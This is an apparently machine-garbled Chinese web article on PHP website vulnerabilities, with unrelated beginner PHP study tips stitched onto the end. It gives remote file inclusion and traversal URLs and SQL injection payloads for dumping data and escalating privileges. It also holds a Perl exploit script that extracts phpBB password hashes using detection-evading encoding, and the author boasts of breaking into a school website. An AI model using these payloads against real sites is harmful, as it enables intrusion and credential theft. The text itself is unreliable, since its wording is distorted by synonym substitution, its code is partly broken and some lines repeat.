PHP网页编程之PHP网站破绽的相干总结

学会了生成静态网页，现在你应该接触一下XML了，恩，XML也了解了，那么AJAX你也得接触接触吧?AJAX完了....然后...   　　从如今的收集平安来看,人人最存眷和接触最多的WEB页面破绽应当是ASP了,在这方面,小竹是专家,我没讲话权.但是在PHP方面来看,也一样存在很严重的平安成绩,然而这方面的文章却不多.在这里,就跟人人来略微的会商一下PHP页面的相干破绽吧.


　 我对今朝罕见的PHP破绽做了一下总结,大致分为以下几种:包括文件破绽,剧本号令履行破绽,文件泄漏破绽,SQL注入破绽等几种.固然,至于COOKIE棍骗等一局部通用的手艺就不在这里会商了,这些材料网上也良多.那末,咱们就一个一个来剖析一下如何使用这些破绽吧!


　 起首,咱们来会商包括文件破绽.这个破绽应当说是PHP独有的吧.这是因为不充实处置内部供应的歹意数据,从而招致近程进击者可以使用这些破绽以WEB历程权限在体系上履行恣意号令.咱们来看一个例子:假定在a.php中有如许一句代码:
　　<?php
　　include(＄include."/xxx.php");
　　?>
　　在这段代码中,＄include通常为一个已设置好的途径,然而咱们可以经由过程本人机关一个途径来到达进击的目标.例如说咱们提交:a.php?include=http://web/b.php,这个web是咱们用做进击的空间,固然,b.php也就是咱们用来进击的代码了.咱们可以在b.php中写入相似于:passthru("/bin/ls /etc");的代码.如许,就能够履行一些有目标的进击了.(注:web办事器应当不克不及履行php代码,否则就出成绩了.相干概况可以去看<<若何对PHP法式中的罕见破绽停止进击>>).在这个破绽方面,出情况的良多,例如说:PayPal Store Front,
HotNews,Mambo Open Source,PhpDig,YABB SE,phpBB,InvisionBoard,SOLMETRA SPAW Editor,Les Visiteurs,PhpGedView,X-Cart等等一些.


　 接着,咱们再来看一下剧本号令履行破绽.这是因为对用户提交的URI参数短少充实过滤，提交包括歹意HTML代码的数据，可招致触发跨站剧本进击，能够取得方针用户的敏感信息。咱们也举个例子:在PHP Transparent的PHP PHP 4.3.1以下版本中的index.php页面临PHPSESSID短少充实的过滤,咱们可以经由过程如许的代码来到达进击的目标:
　　http://web/index.php?PHPSESSID="><script>...</script>在script外面咱们可以机关函数来取得用户的一些敏感信息.在这个破绽方面绝对要少一点,除PHP Transparent以外还有:PHP-Nuke,phpBB,PHP Classifieds,PHPix,Ultimate PHP Board等等.


　　再然后,咱们就来看看文件泄漏破绽了.这类破绽是因为对用户提交参数短少充实过滤，近程进击者可以使用它停止目次遍历进击和获得一些敏感信息。咱们拿比来发明的phpMyAdmin来做例子.在phpMyAdmin中,export.php页面没有对用户提交的'what'参数停止充实过滤,近程进击者提交包括多个'../'字符的数据，即可绕过WEB ROOT限制，以WEB权限检查体系上的恣意文件信息。例如说打入如许一个地址:export.php?what=../../../../../../etc/passwd%00 就能够到达文件泄漏的目标了.在这方面绝对多一点,有:myPHPNuke,McNews等等.


　　最初,咱们又要回到最高兴的中央了.想一想咱们平常在asp页面顶用SQL注入有何等爽,之前还要手动注入,一向到小竹悟出"SQL注入密笈"(嘿嘿),然后再开做出NBSI今后,咱们NB同盟真是拉出一片天空.曾前后帮CSDN,豪富翁服装论坛,中国频道等大型网站找露马脚.(这些空话不多说了,有点跑题了...).仍是言规正传,其其实asp中SQL的注入和php中的SQL注入大致不异,只不外略微注重一下用的几个函数就行了.将asc改成ASCII,len改成LENGTH,其他函数根基不变了.其实人人看到PHP的SQL注入,是否是城市想到PHP-NUKE和PHPBB呢?不错,俗语说树大招分,像动网如许的服装论坛在asp界就该是破绽这王了,这并非说它的服装论坛平安太差,而是名望太响,他人用的多了,研讨的人也就多了,发明的平安破绽也就越多了.PHPBB也是一样的,如今很大一局部人用PHP做服装论坛的话,普通都是选择了PHPBB.它的破绽也是一向在出,从最早phpBB.com phpBB 1.4.0版本被人发明破绽,到如今比来的phpBB 2.0.6版本的groupcp.php,和之前发明的search.php,profile.php,viewtopic.php等等加起来,也许也有十来个模样吧.这也一向招致,一局部人在研讨php破绽的时分城市拿它做实行品,所谓百练成精嘛,信任今后的PHPBB会愈来愈好.


　 好了,咱们仍是来剖析一下破绽发生的缘由吧.拿viewtopic.php页面来讲,因为在挪用viewtopic.php时，直接从GET恳求中取得"topic_id"并传递给SQL查询号令,而并没有停止一些过滤的处置,进击者可以提交特别的SQL字符串用于取得MD5暗码，取得此暗码信息可以用于主动登录或停止暴力破解。(我想应当不会有人想去暴力破解吧,除非有出格主要的缘由).先看一下相干源代码:
#　　　if ( isset(＄HTTP_GET_VARS[POST_TOPIC_URL]) )
#　　　{
#　　 　　　＄topic_id = intval(＄HTTP_GET_VARS[POST_TOPIC_URL]);
#　　　}
#　　　else if ( isset(＄HTTP_GET_VARS['topic']) )
#　　　{
#　　 　　　＄topic_id = intval(＄HTTP_GET_VARS['topic']);
#　　　}
从下面咱们可以看出,假如提交的view=newest而且sid设置了值的话,履行的查询代码像上面的这个模样(假如你还没看过PHPBB源代码的话,建议你看了再对着这里来看,受影响体系为:phpBB 2.0.5和phpBB 2.0.4).
#　　 　　 　＄sql = "SELECT p.post_id
#　　 　　 　FROM " . POSTS_TABLE . " p, " . SESSIONS_TABLE . " s, " . USERS_TABLE . " u
#　　 　　 　WHERE s.session_id = '＄session_id'
#　　 　　 　　 AND u.user_id = s.session_user_id
#　　 　　 　　 AND p.topic_id = ＄topic_id
#　　 　　 　　 AND p.post_time >= u.user_lastvisit
#　　 　　 　ORDER BY p.post_time ASC
#　　 　　 　LIMIT 1";
Rick供应了上面的这断测试代码:
use IO::Socket;
＄remote = shift || 'localhost';
＄view_topic = shift || '/phpBB2/viewtopic.php';
＄uid = shift || 2;
＄port = 80;
＄dbtype = 'mysql4';　　# mysql4 or pgsql
print "Trying to get password hash for uid ＄uid server ＄remote dbtype: ＄dbtype\n";
＄p = "";
for(＄index=1; ＄index<=32; ＄index++)
{
　　　＄socket = IO::Socket::INET->new(PeerAddr => ＄remote,
　　 　　 　　 　　 　　　PeerPort => ＄port,
　　 　　 　　 　　 　　　Proto => "tcp",
　　 　　 　　 　　 　　　Type => SOCK_STREAM)
　　　or die "Couldnt connect to ＄remote:＄port : ＄@\n";
　　　＄str = "GET ＄view_topic" . "?sid=1&topic_id=-1" . random_encode(make_dbsql()) . "&view=newest" . " HTTP/1.0\n\n";
　　　print ＄socket ＄str;
　　　print ＄socket "Cookie: phpBB2mysql_sid=1\n";　 # replace this for pgsql or remove it
　　　print ＄socket "Host: ＄remote\n\n";
　　　while (＄answer = <＄socket>)
　　　{
　　 　　 　 if (＄answer =~ /location:.*\x23(\d+)/) # Matches the location: viewtopic.php?p=<num>#<num>
　　 　　 　 {
　　 　　 　　 　　 ＄p .= chr ();
　　 　　 　 }
　　　}
　　　close(＄socket);
}
print "\nMD5 Hash for uid ＄uid is ＄p\n";
# random encode str. helps avoid detection
sub random_encode
{
　　　＄str = shift;
　　　＄ret = "";
　　　for(＄i=0; ＄i<length(＄str); ＄i++)
　　　{
　　 　　 　 ＄c = substr(＄str,＄i,1);
　　 　　 　 ＄j = rand length(＄str) * 1000;


　　 　　 　 if (int(＄j) % 2 || ＄c eq ' ')
　　 　　 　 {
　　 　　 　　 　　 ＄ret .= "%" . sprintf("%x",ord(＄c));
　　 　　 　 }
　　 　　 　 else
　　 　　 　 {
　　 　　 　　 　　 ＄ret .= ＄c;
　　 　　 　 }
　　　}
　　　return ＄ret;
}
sub make_dbsql
{
　　　if (＄dbtype eq 'mysql4')
　　　{
　　 　　 　 return " union select ord(substring(user_password," . ＄index . ",1)) from phpbb_users where user_id=＄uid/*" ;
　　　} elsif (＄dbtype eq 'pgsql')
　　　{
　　 　　 　 return "; select ascii(substring(user_password from ＄index for 1)) as post_id from phpbb_posts p, phpbb_users u where u.user_id=＄uid or false";
　　　}
　　　else
　　　{
　　 　　 　 return "";
　　　}
}
这断代码,我就不多做注释了.感化是取得HASH值.


　 看到这里,人人能够有点疑问,为何我后面讲的那些改的函数怎样没有效到,我讲出来不怕人人笑话:其实网上良多站点有些页面的查询语句看起来会是如许:
display.php?sqlsave=select+*+from+aaa+where+xx=yy+order+by+bbb+desc
不要笑,这是真的,我还靠这个进过几个大型网站.至于哪一些,欠好讲出来,不外咱们黉舍的网站,我就是靠这个进后台的(但愿黉舍收集中间的看不到这篇文章,^_^).把后面那函数用上吧.否则你只要改人家的暗码了哦!!!


　 差点忘了一点,在SQL注入的时分,PHP与ASP有所分歧,mysql对sql语句的应用没有mssql天真,因而,良多在mssql上可以用的查询语句在mysql数据库中都不克不及见效了. 普通咱们罕见的注入语句像如许:aaa.php?id=a' into outfile 'pass.txt或是aaa.php?id=a' into outfile 'pass.txt' /*再进一步可以改成:aaa.php?id=a' or 1=1 union select id,name,password form users into outfile 'c:/a.txt
如许可以将数据库数据导出为文件,然后可以检查.
　　或是如许:mode=',user_level='4
这个语句普通用在修正材料时,假定页面存在破绽的话,就能够到达提拔权限的做用.
其它的如' OR 1=1 -- 或:1' or 1='1则跟asp差不多.这里不多讲了.在php外面,SQL注入看来仍是破绽之首啊,有太多的页面存在这个成绩了.


　　其实人人可以看出来,下面那些分类归根结柢只要一个缘由:提交参数没过滤或是过滤不敷严谨.黑客防地历来有攻有守.这里,就大致讲一下提防的办法吧.
　　
　 起首,我团体以为最主要的一点是将magic_quotes_gpc高为ON,它的感化是将单引号,双引号,反斜线,和空字符转换为含有反斜线的字符,如select * from admin where username='＄username' and password='＄password'语句,进击者想用1' or 1='1跳过验证,然而,那些字符串将被转换成如许:select * from admin where username='a' and password='1\' or 1=\'1'从而到达禁止注入的目标,现实也就是主动停止了addslashes()操作.再不可的话,本人界说函数处置吧.如今看来,那些弄PHP注入的人也对照愁闷,由于myslq4以下版本不撑持子语句,而新版本的mysql又会将magic_quotes_gpc选项默许为开.


　 处理包括文件破绽用的办法就是:请求法式员包括文件里的参数尽可能不要利用变量，假如利用变量，就必定要严厉反省要包括的文件名，相对不克不及由用户恣意指定,建议设global_variables为off。如后面文件翻开中限制PHP操作途径是一个需要的选项。别的，如非特别需求，必定要封闭PHP的近程文件翻开功效。修正php.ini文件：allow_url_fopen = Off(注:拜见<<PHP平安成绩：近程溢出、DoS、safe_mode绕过破绽>>).


　 还有一点我感觉良多网站城市有这个成绩,就是没有关毛病显示.轻一看能够没甚么,然而一些盯了好久(用词有点不合错误哦)的人就能够经由过程毛病提醒来取得如数据库信息,网页文件物理途径等等。学习数据库了，MYSQL可算是PHP的黄金搭档了，不过，虽然话是这么说，你也可能恨不得把MYSQL给生吞活剥了，因为这一行一列的东东简直让自己头晕目眩。

曾经犯过一个很低级的错误，我在文件命名的时候用了一个横线\\\\\\\'-\\\\\\\' 号，结果找了好几个小时的错误，事实是命名的时候 是不能用横线 \\\\\\\'-\\\\\\\' 的，应该用的是下划线  \\\\\\\'_\\\\\\\' ;

建议加几个专业的phper的群，当然啦需要说话的人多，一处一点问题能有人回答你的，当然啦要让人回答你的问题，平时就得躲在里面聊天，大家混熟啦，愿意回答你问题的人自然就多啦。

使用 jquery 等js框架的时候，要随时注意浏览器的更新情况，不然很容易发生框架不能使用。

在我安装pear包的时候老是提示，缺少某某文件，才发现 那群extension 的排列是应该有一点的顺序，而我安装的版本的排序不是正常的排序。没办法我只好把那群冒号加了上去，只留下我需要使用的扩展。

兴趣是最好的老师，百度是最好的词典。

本文当是我的笔记啦，遇到的问题随时填充

本文当是我的笔记啦，遇到的问题随时填充

使用zendstdio 写代码的的时候，把tab 的缩进设置成4个空格是很有必要的

装在C盘下面可以利用windows的ghost功能可以还原回来（顺便当做是重转啦），当然啦我的编译目录要放在别的盘下，不然自己的劳动成果就悲剧啦。

作为一个合格的coder 编码的规范是必须，命名方面我推崇“驼峰法”，另外就是自己写的代码最好要带注释，不然时间长了，就算是自己的代码估计看起来都费事，更不用说别人拉。

建数据库表的时候，int型要输入长度的，其实是个摆设的输入几位都没影响的，只要大于4就行，囧。

不禁又想起那些说php是草根语言的人，为什么认得差距这么大呢。

写js我最烦的就是 ie 和 firefox下同样的代码 结果显示的结果千差万别，还是就是最好不要用遨游去调试，因为有时候遨游是禁用js的，有可能代码是争取结果被遨游折腾的认为是代码写错。

其实也不算什么什么心得，在各位大侠算是小巫见大巫了吧，望大家不要见笑，若其中有错误的地方请各位大虾斧正。

首推的搜索引擎当然是Google大神，其次我比较喜欢 百度知道。不过搜出来的结果往往都是 大家copy来copy去的，运气的的概率很大。

首先声明：我是一个菜鸟，是一个初学者。学习了一段php后总是感觉自己没有提高，无奈。经过反思我认为我学习过程中存在很多问题，我改变了学习方法后自我感觉有了明显的进步。

多看优秀程序员编写的代码，仔细理解他们解决问题的方法，对自身有很大的帮助。

说php的话，首先得提一下数组，开始的时候我是最烦数组的，总是被弄的晕头转向，不过后来呢，我觉得数组里php里最强大的存储方法，所以建议新手们要学好数组。

本文当是我的笔记啦，遇到的问题随时填充